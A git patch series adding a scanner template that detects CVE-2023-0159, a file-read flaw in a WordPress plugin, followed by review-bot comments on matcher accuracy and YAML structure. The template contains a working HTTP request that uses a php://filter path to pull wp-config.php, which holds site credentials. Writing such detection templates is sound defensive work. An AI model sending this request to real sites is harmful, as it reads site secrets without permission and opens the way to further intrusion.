From 279bcccc339263063d2e5216d32db8782952e6e6 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 31 Mar 2024 12:55:33 +0530
Subject: [PATCH 1/2] Added template for CVE-2023-0159
---
 http/cves/2023/CVE-2023-0159.yaml | 46 +++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-0159.yaml
diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml
new file mode 100644
index 0000000000..012b96a8e4
--- /dev/null
+++ b/http/cves/2023/CVE-2023-0159.yaml
@@ -0,0 +1,46 @@
+id: CVE-2023-0159
+
+info:
+ name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
+ author: c4sper0
+ severity: high
+ description: |
+ The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
+ reference: |
+ - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
+ - https://github.com/im-hanzou/EVCer
+ - https://github.com/nomi-sec/PoC-in-GitHub
+ - https://github.com/xu-xiang/awesome-security-vul-llm
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2023-0159
+ epss-score: 0.00199
+ epss-percentile: 0.56869
+ cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
+ metadata:
+ vendor: wprealize
+ product: extensive_vc_addons_for_wpbakery_page_builder
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
+ tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{"status":"success","message":"Items are loaded","data":'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From 559ba29603ec2a2b636da709d48be7ed734d7387 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sun, 31 Mar 2024 23:15:32 +0530
Subject: [PATCH 2/2] added remediation
---
 http/cves/2023/CVE-2023-0159.yaml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
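Review bot: The two matchers at the end of the new template confirm only the generic AJAX success envelope (`{"status":"success","message":"Items are loaded","data":` plus a 200), not that the requested file came back, so a patched install that answers the same action with ordinary data would presumably still be reported as vulnerable. Because the request asks for base64-encoded output of a PHP file, a second entry under `words` with `condition: and` on that matcher, such as `- 'PD9waH'` (the start of base64-encoded `<?php`), would tie the finding to the disclosure itself; this assumes the encoded content appears verbatim in `data`, which the page does not show. The `name` also says "Unauthenticated RCE" while the request, the `lfi` tag and the `C:H/I:N/A:N` vector all describe a file read, so naming it an arbitrary file read would keep triage and severity expectations accurate.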
diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml
index 012b96a8e4..6f79116065 100644
--- a/http/cves/2023/CVE-2023-0159.yaml
+++ b/http/cves/2023/CVE-2023-0159.yaml
@@ -6,11 +6,13 @@ info:
 severity: high
 description: |
 The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
+ remediation: Fixed in 1.9.1
 reference: |
 - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
 - https://github.com/im-hanzou/EVCer
 - https://github.com/nomi-sec/PoC-in-GitHub
 - https://github.com/xu-xiang/awesome-security-vul-llm
+ - https://wordpress.org/plugins/extensive-vc-addon/
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
@@ -23,7 +25,7 @@ info:
 product: extensive_vc_addons_for_wpbakery_page_builder
 framework: wordpress
 publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
- tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi
+ tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon
 
 http:
 - raw:
@@ -43,4 +45,4 @@ http:
 
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
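Review bot: The added wordpress.org URL in the first hunk lands inside `reference: |`, so the reference list is still one literal multi-line string of dash-prefixed lines rather than a YAML sequence; dropping the `|` (plain `reference:` followed by the `- https://…` items) would give consumers a real list. The new `remediation: Fixed in 1.9.1` would be more actionable as `remediation: Update the Extensive VC Addons for WPBakery page builder plugin to version 1.9.1 or later.` The `info:` mapping these lines belong to starts above the hunk.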